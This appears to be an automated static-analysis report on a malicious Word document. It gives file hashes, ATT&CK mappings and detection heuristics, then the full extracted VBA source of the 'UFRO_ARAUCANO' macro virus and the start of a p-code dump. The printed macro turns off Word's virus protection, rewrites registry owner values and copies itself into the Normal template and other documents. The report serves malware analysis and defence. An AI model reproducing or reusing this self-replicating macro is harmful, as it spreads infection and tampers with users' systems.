Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 06a99667e6349f54…

MALICIOUS

Office (OLE)

27.5 KB Created: 2000-08-22 22:26:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: c13a0871eb4ea39397bb7609cd32cfa5 SHA-1: ab0b9c1e4818e9c4f78960e9165704c3d809a32c SHA-256: 06a99667e6349f54da3020c2a61156fac9a2230bbee25a466e35a6af9f41086a
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros that attempt to modify system registry values for 'RegisteredOwner' and 'RegisteredOrganization'. This behavior is indicative of malware attempting to establish persistence or modify system identification. The macro code is partially truncated, but the intent to alter these specific registry keys is clear. The ClamAV detection 'Doc.Trojan.Ded-1' further supports the malicious nature of the file.

Heuristics 2

  • ClamAV: Doc.Trojan.Ded-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Ded-1
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6099 bytes
SHA-256: ce9d3b9521e5f9121d634afc93cd8fae5fdbcb2c3cbd81da4c88fd06a1c395f0
Detection
ClamAV: Doc.Trojan.Ded-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Nombre del virus: UFRO_ARAUCANO
'Origen: Temuco - Chile

Private Sub Document_Close()
On Error GoTo ARAUCANO
Options.VirusProtection = False
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "RegisteredOwner") = "Temuco Virus Ufro"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "RegisteredOrganization") = "UFRO_ARAUCANO"
If Month(Now()) = 10 And Day(Now()) = 10 Then MsgBox "UFRO_ARAUCANO", vbInformation, "INFORMACIÓN!!!"
With Dialogs(wdDialogFileSummaryInfo)
    .Author = "adk-tvu"
    .Execute
Randomize
If Int(3 * Rnd) = 1 Then
   UFRO_ARAUCANO
End If
ARAUCANO:
End With
End Sub
 Private Sub UFRO_ARAUCANO()
If Not ActiveDocument.VBProject.VBComponents(1).CodeModule.Find("Document_Close", 1, 1, 1000, 1000, False, False) Then
    For I = 1 To NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines
        lineofcode = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(I, 1)
        ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines I * 3, lineofcode
     Next I
    ActiveDocument.SaveAs AddToRecentFiles:=False
Else
If Not NormalTemplate.VBProject.VBComponents(1).CodeModule.Find("Document_Close", 1, 1, 1000, 1000, False, False) Then
    For I = 1 To ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines
        lineofcode = ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(I, 1)
        NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines I * 3, lineofcode
    Next I
    NormalTemplate.Save
End If
End If
End Sub

' Processing file: /opt/analyzer/scan_staging/4c37fa1e7e5a4e67a15c491a7d7b2490.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3289 bytes
' Line #0:
' 	QuoteRem 0x0000 0x001F "Nombre del virus: UFRO_ARAUCANO"
' Line #1:
' 	QuoteRem 0x0000 0x0016 "Origen: Temuco - Chile"
' Line #2:
' Line #3:
' 	FuncDefn (Private Sub Document_Close())
' Line #4:
' 	OnError ARAUCANO 
' Line #5:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #6:
' 	LitStr 0x0011 "Temuco Virus Ufro"
' 	LitStr 0x0000 ""
' 	LitStr 0x003C "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion"
' 	LitStr 0x000F "RegisteredOwner"
' 	Ld System 
' 	ArgsMemSt PrivateProfileString 0x0003 
' Line #7:
' 	LitStr 0x000D "UFRO_ARAUCANO"
' 	LitStr 0x0000 ""
' 	LitStr 0x003C "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion"
' 	LitStr 0x0016 "RegisteredOrganization"
' 	Ld System 
' 	ArgsMemSt PrivateProfileString 0x0003 
' Line #8:
' 	ArgsLd Now 0x0000 
' 	ArgsLd Month 0x0001 
' 	LitDI2 0x000A 
' 	Eq 
' 	ArgsLd Now 0x0000 
' 	ArgsLd Day 0x0001 
' 	LitDI2 0x000A 
' 	Eq 
' 	And 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x000D "UFRO_ARAUCANO"
' 	Ld vbInformation 
' 	LitStr 0x000E "INFORMACIÓN!!!"
' 	ArgsCall MsgBox 0x0003 
' 	EndIf 
' Line #9:
' 	StartWithExpr 
' 	Ld wdDialogFileSummaryInfo 
' 	ArgsLd Dialogs 0x0001 
' 	With 
' Line #10:
' 	LitStr 0x0007 "adk-tvu"
' 	MemStWith Author 
' Line #11:
' 	ArgsMemCallWith Execute 0x0000 
' Line #12:
' 	ArgsCall Read 0x0000 
' Line #13:
' 	LitDI2 0x0003 
' 	Ld Rnd 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0001 
' 	Eq 
' 	IfBlock 
' Line #14:
' 	ArgsCall UFRO_ARAUCANO 0x0000 
' Line #15:
' 	EndIfBlock 
' Line #16:
' 	Label ARAUCANO 
' Line #17:
' 	EndWith 
' Line #18:
' 	EndSub 
' Line #19:
' 	FuncDefn (Private Sub UFRO_ARAUCANO())
' Line #20:
' 	LitStr 0x000E "Document_Close"
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	LitDI2 0x03E8 
' 	LitDI2 0x03E8 
' 	LitVarSpecial (False)
' 	LitVarSpecial (False)
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Find 0x0007 
' 	Not 
' 	IfBlock 
' Line #21:
' 	StartForVariable 
' 	Ld 
... (truncated)